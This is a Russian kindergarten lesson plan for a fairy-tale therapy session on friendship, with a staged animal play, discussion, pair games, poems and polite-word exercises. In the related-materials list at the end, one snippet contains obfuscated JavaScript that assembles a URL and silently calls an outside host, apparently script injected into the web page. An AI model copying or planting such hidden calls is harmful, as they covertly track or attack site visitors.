Сказкотерапия. Занятие "Учимся дружить"
план-конспект занятия (подготовительная группа)

Душина Елена Владимировна

Это занятие по сказкотерпии поможет детям сформировать понятие о дружбе, учить работать в парах, проявлять свои эмоции

Скачать:

ВложениеРазмер
Microsoft Office document icon skazkoterapiya_uchimsya_druzhit.doc61 КБ

Предварительный просмотр:

 План   занятия по сказкотерапии на тему:  «Учимся   дружить»,

(по сказке В. Пляцковского «Как утенок потерял свою тень»)

 

Задачи

Воспитательные:

– формировать понятие о дружбе, определить «правила поведения друзей», через беседы и драматизацию

-  учить сотрудничеству, умению работать в паре

-  воспитывать сочувствие, эмпатию, сопереживание

-  активизировать словарь: «вежливые» слова, понятия  - дружба, дружить, дружный

Развивающие:

-  развивать логическое мышление: анализ, классификация

- развивать выразительность речи и движений через инсценировки и мимические этюды

-  развитие фантазии, творчество

Предварительная работа:

  1. Изучение эмоций человека
  2. Изучение «Вежливых слов» и способов их применения
  3. Чтение сказок Сутеева, Пляцковского и их обыгрывание
  4. Чтение сказок, рассказов и стихов на тему «Как надо себя вести с друзьями»
  5. Разучивание и инсценировка с детьми сказки В. Пляцковского «Как утенок потерял свою тень»

Оборудование:

  1. Декорации  и атрибуты к спектаклю
  2. Маски и костюмы: цыпленок, утенок, козленок, заяц, лиса, еж, ворона, муравей, бабочка, воробей, медведь.
  3. Картинки со сказочными персонажами в разных эмоциональных состояниях,
  4. Музыкальное сопровождение к спектаклю и играм.

  1. Подготовительный этап

Психолог – Ребята, сегодня  наше занятие снова пройдет в театральной комнате. Но перед тем, как мы его начнем, я хочу вас спросить: какое у вас настроение?

Дети  отвечают

Психолог  – чтобы настроение у всех было хорошее у всех, давайте встанем в круг, возьмемся за руки «пустим улыбку по кругу». Кто начнет?

Дети выполняют.

  1. Основной этап

Психолог  -  Сегодня мы с вами просто так в театр не попадем. Посмотрите: кто-то нас не пускает. Скажите -  кто это на двери?

Дети – сказочные герои

Психолог – Правильно, каждый из них выражает какую то эмоцию. Назовите героев и их эмоции, кто из них веселый, грустный, удивленный, напуганный, злой, спокойный.

      Дети называют героев и определяют их эмоции.

Психолог – Молодцы! Теперь мы можем зайти в зал и посмотреть сказку «Как утенок потерял свою тень».

        Инсценировка

 Утенок-

Здравствуй, солнце, здравствуй, мячик

Ну а я – утенок Крячик

Я сейчас иду гулять,

Только с кем мне поиграть?

Если был бы рядом друг…

Надо посмотреть вокруг.

        (смотрит вокруг, находит свою тень)

Ой, да это моя тень!

Здравствуй, здравствуй, добрый день!

       (играет с тенью в мяч, появляется козленок)

Козленок-

Я тебе не помешаю?

Можно тоже поиграю?

Я – козленок Мармелад.

И люблю я шоколад,

А еще люблю варенье, и конфеты и печенье

Утенок -

Все, что хочешь – то люби

А от нас ты отойди

Козленок-

Ты один, и я один,

И не вижу я причин,

Чтоб нам вместе не гулять

Утенок-

Видишь, я гуляю с тенью,

Мы играем с ней в футбол.

Уходи, батончик-пончик

Или в глаз получишь гол!

     (козленок уходит, появляется цыпленок)

Цыпленок-

В небе солнце катится, словно колобок

И похоже солнышко, вон на тот цветок.

     (срывает цветок и дарит его утенку)

Ой, утеночек, Привет!

Утенок -

Это что здесь за букет?

Цыпленок-

Я цыпленок – Фью-фью-фью,

Очень я цветы люблю.

Я вчера только родился,

Еще ни с кем не подружился

Утенок -

Друг не нужен, уже есть.

Видишь, не один я здесь

Вместе с тенью я гуляю,

А с цветами не играю.

Попрошу не трогать мячик,

Мелкий желтый одуванчик.

     (толкает цыпленка, тот плачет)

Солнце-

Успокойся, и не плач,

Вот тебе, цыпленок, мяч

Видеть слезки не хочу,

Я утенка проучу.

     (кидает мяч цыпленку, заходит козленок)

Козленок-

Цыпленок-

Я козленок – Мармелад.

Я – цыпленок, очень рад

     (солнце прячется за тучку, тень исчезает)

Утенок -

Что такое? Что случилось?

Тень пропала, солнце скрылось.

Тень, ты где?

Козленок-

Слышишь, Фью.

Вон там за горкой кто-то нас на помощь звал

Побежали, побежали, может, кто в беду попал.

Утенок -

Некрасиво получилось – я недавно вас прогнал,

Вы спасли меня из ямы, когда я на помощь звал

Был я с вами очень грубым,

И прошу меня простить

Может, вы еще согласны –

Будете с мной дружить?

Цыпленок-

Мы дружить с тобой согласны,

Только где же твоя тень?

Утенок -

Потерялась…

Цыпленок-

Потерялась? Нам найти ее не лень.

 (солнышко выходит из-за тучи, тень появляется)

Утенок -

Ой нашлась! Но только с тенью

Не имею больше дел.

Я нашел друзей получше,

Настоящих, как хотел!

                  Беседа по содержанию

Психолог – Ребята, вам понравилась сказка? Все ли герои  сказки умели дружить? Почему утенок не захотел играть с другими зверятами? Как вы можете охарактеризовать героев? Изменился утенок, после того как друзья спасли его?

Дети отвечают.

           Активизация невербального общения

Психолог  – Ребята, как вы думаете, почему утенку понравилась играть с его тенью? Как они общались?

Дети – без слов, жестами, движениями

Психолог  -  А какие движения делал утенок, когда разговаривал с козленком и цыпленком?

Дети – он дразнился, дрался, толкался.

Психолог  – Можно ли понять человек без слов?

Дети – Да, по мимике, движениям, настроению.

Психолог  -  Молодцы. Я попрошу вас разбиться на пары. Кто-то из вас будет утенком, а второй -  его тень.  Договоритесь, пожалуйста.

Дети находят себе пару.

Психолог  – Теперь вы можете поиграйте со своей тенью. Тень повторяет все движения за своим «хозяином».

Дети изображают позы, движения, и повторяют друг за другом, потом меняются местами.

Психолог  – А сейчас мне нужны помощники, вы будете изображать разные эмоции. Остальные ребята, скажут, с кем из них они хотели бы дружить.

Дети выходят и изображают настроения:

- веселый, грустный, злой,

- жадный, обиженный, добрый

- дерется, боится, стоит спокойно, кривляется

Психолог  – Давайте определим: если вы хотите, чтобы с вами дружили, как надо себя вести?

Дети – не драться, не кривляться, улыбаться.

        Активизация вербального общения

Психолог – Ребята, вспомните, как разговаривал утенок со зверятами сначала?

Дети – грубо, обзывался.

Психолог  – послушайте два стихотворения

Обезьянка задавака,

всех вокруг дразнила

Зайца, белочку, собаку,

льва и крокодила

обзывалась как попало,

брызгалась из лужи,

и теперь она одна,

с ней никто не дружит

обезьянка, будь умнее

лучше постарайся,

будь приветливей, добрее

и не обзывайся.

Будут все с тобой дружить,

Веселее станет жить

Ягненок, хоть был

По возрасту мал

Охотно он сплетни

Про всех собирал.

Всегда очень плохо

Про всех говорил,

За это ягненка

Никто не любил.

И с ним не играют,

Не верят ему

Рассказывай сказки

Себе самому.

Когда вы не знаете,

Что рассказать,

То лучше, наверно,

 Просто молчать.

Психолог  - Скажите, почему со зверятами никто не хотел дружить?

Дети – они были грубыми, не умели пользоваться словами.

Психолог  – Очень важно, когда вы играете друг с другом, что вы говорите. Словом можно обидеть, а можно поднять настроение. А есть слова, которые называются «волшебными». Какие?

Психолог  - «вежливые» слова.

Психолог  – давайте вспомним их. Я буду говорить слова, а вы должны найти лишнее.

«Привет, здравствуй, извини, добрый день»

«Спасибо, пожалуйста, благодарю»

«До свиданья, пока, спокойной ночи»

Психолог  – Давайте определим: если вы хотите, чтобы с вами дружили, как надо разговаривать с другими людьми?

Дети – разговаривать спокойно, вежливо, не кричать.

Рефлексия

Психолог  -  Ребята, скажите, в какой сказке герои были самыми дружными? Что надо помнить и делать, чтобы с тобой хотели играть и дружить?

Психолог -   Все-все молодцы! Что вам сегодня больше всего понравилось?

Ритуал окончания. Все дети встают в круг, берутся за руки и говорят: «Всем-всем спасибо, все-все молодцы!»


По теме: методические разработки, презентации и конспекты

Проект по сказкотерапии "По дорогам сказок" (роль сказкотерапии в социально - личностном развитии детей)

Проект по сказкотерапии «По дорогам сказок».(роль сказкотерапии в социально – личностном развитии детей)...

Руководство по сказкотерапии. "Сказкотерапия, как воспитательная система органичная внутренней среде человека"

Руководство по сказкотерапии адресовано педагогам, родителям и всем тем, кто чувствует близость к сказочному жанру. Здесь в популярной форме рассказывается о том, какие виды сказок существуют, ка...

Сказкотерапия-как форма работы с детьми .Практикум по сказкотерапии

laquo;Сказкотерапия» - понятие, которое появилось сравнительно недавно, и у разных специалистов оно порождает множество ассоциаций. Для одних «сказкотерапия» - это лечение сказками....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...

Программа семейного клуба «Учимся дружить» Название: Программа семейного клуба «Учимся дружить» Работа с родителями вновь прибывших детей. 2019-2020год

Программа  семейного клуба «Учимся дружить». 1. Паспорт программы.Наименование программы «Учимся дружить» программа семейного клуба в условиях ДОУЦель программы:...